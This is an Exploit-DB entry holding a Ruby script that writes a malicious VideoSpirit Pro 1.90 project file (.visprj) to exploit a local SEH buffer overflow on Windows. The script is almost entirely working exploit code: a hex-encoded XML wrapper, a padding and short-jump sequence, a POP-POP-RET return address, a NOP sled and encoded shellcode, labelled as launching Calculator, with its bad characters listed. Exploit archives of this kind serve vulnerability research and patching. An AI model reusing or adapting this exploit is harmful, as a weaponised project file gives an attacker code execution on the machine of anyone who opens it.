VideoSpirit Pro 1.90 - Local Buffer Overflow (SEH)

EDB-ID:

29547

CVE:



Author:

metacom

Type:

local


Platform:

Windows

Date:

2013-11-12


#!/usr/bin/ruby
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
print '''
        
		VideoSpirit Pro Seh Buffer Overflow
		Version: Pro 1.90
		Date found: 11.11.2013
		Exploit Author: metacom
		Tested on: Win7-Win8-WinXp-Sp3-EN
'''
sleep(3)
head=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")
junk="\x41" * 104
junk+="\xeb\x0c\xff\xff" # jump
junk+=[0x10113FD3].pack('V')# 10113FD3   5F  POP EDI
junk+="\x90" * 80 # landing zone
junk+=("\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"+
"\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd"+
"\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43"+
"\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0"+
"\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f"+ # Calc Shellcode
"\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40"+ # Bad Characters
"\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c"+ # \x00\x0a\x0d\x1a\x21\x22\x26
"\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e"+
"\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19"+
"\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33"+
"\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90"+
"\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee"+
"\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7"+
"\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56"+
"\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2"+
"\x99\x03")
junk+="\xCC" * 4500
footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")
off= head + junk + footer
print "\t\t[+]Creating Exploit File...\n"
sleep(1)
begin
File.open("Exploit.visprj","wb") do |f| 
f.write off
f.close
print "\t\t[+]File Exploit.visprj create successfully.\n"
sleep(1)
end
rescue
print "**[-]Error: #{$!}\n"
exit(0)
end